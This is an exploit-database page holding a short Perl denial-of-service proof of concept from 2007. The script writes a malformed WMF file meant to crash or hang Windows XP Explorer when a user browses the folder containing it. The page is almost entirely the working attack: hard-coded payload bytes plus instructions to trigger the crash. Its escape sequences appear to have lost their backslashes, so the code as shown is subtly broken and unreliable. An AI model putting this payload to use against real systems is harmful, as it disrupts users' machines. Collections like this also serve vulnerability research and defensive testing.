[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit
# Published : 2007-01-13
# Author : cyanid-E
# Previous Title : Mac OS X 10.4.8 AppleTalk ATPsndrsp() Heap Buffer Overflow PoC
# Next Title : VLC Media Player 0.8.6a Unspecified Denial of Service Exploit
#!/usr/bin/perl
print "nWMF PoC denial of service exploit by cyanid-E <biz4rre@gmail.com>";
print "nngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf filen";
print WMF "x01x00x09x00x00x03x22x00x00x00x63x79x61x6Ex69x64";
print WMF "x2Dx45x07x00x00x00xFCx02x00x00x00x00x00x00x00x00";
print WMF "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00";
print WMF "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00";
print WMF "x00x00x00x00";
close(WMF);
print "oknnnow try to browse folder in XP explorer and wait :)n";
# www.Syue.com [2007-01-13]